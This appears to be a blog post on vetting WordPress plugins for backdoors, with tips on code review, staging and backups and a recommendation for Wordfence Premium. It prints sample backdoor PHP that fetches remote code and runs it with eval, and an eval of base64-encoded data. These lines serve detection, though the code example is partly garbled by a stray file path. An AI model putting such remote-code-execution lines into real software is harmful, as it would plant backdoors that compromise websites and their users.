Are You Trusting WordPress Plugins Too Much
When it comes to installing a new plugin, I almost always find myself asking: “Do I really need a plugin for this, or can I just write my own code?” The reason being, I simply don’t like having too many plugins installed on my website. More plugins means more bloat, which can slow down your website and potentially cause other performance issues. And not just that, but it also introduces security risks that can put you or your users in harm’s way. With plugins, less is more.
In a recent article posted by TechCrunch, “Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites,” it shows that just because a plugin has millions of installs doesn’t mean it’s safe. I’ve put together a list of things you can watch out for to verify before installing any plugin into a live production site.
- Look for suspicious code such as eval(, base64_decode(, gzinflate(, and remote URLs. The best way to do this is to navigate to the plugin folder in your WordPress install.
wp-content/plugins/plugin-name/Inside the plugin folder, you should see files that look similar to this list:
- plugin-name.php (man file)
- other .php files
- sometimes /includes/ or /admin/ folders
Open plugin-name.php and search for eval(, base64_decode(, gzinflate(, and remote URLs. Be sure to also check around in the “includes” folder if you have one. Sometimes hackers will try and hide stuff int here as well.
Examples of bad code might look like:
wp-content/plugins/plugin$code = file_get_contents("http://random-site.com/code.php");
eval($code);
eval(base64_decode("aWYoJHh4KXs..."));-name/2. Search the name of the plugin + “vulnerability” or the word “hack”
Install the plugin on a staging website and test it there before moving it to a live production site (this is always a good practice, you should almost never make changes to your live website without first testing on a staging site)
3. Always back up your website regularly! A really good plugin for backups is UpdraftPlus but I recommend manual backups and then you’ve just eliminated another a plugin that you really don’t need.
But not for nothing, one of the best plugins you can install in website is Wordfence Premium. Without exception, this is one plugin I will never go without for any of my WordPress websites. I’ve actually made a tutorial about Wordfence showing how to set up 2FA, which nowadays is crucial especially many platforms now require it. This just makes your site more protected in case your WordPress credentials get into the hands of the wrong person.
Something else Wordfence does is scan for common threats and malware that may be inside plugins and could put your website at risk. While the free version is better than not having any protection, I recommend the Premium version because it provides real-time protection. If you go with the free version, it’s still better than not having any protection but the issue with that is that there is still about a 30-day delay in receiving new firewall rules and malware signatures. For $149 a year, it’s well worth the investment to protect your website and reputation as well as the users interacting with your site.
Learn more about Wordfence by visiting my review page.
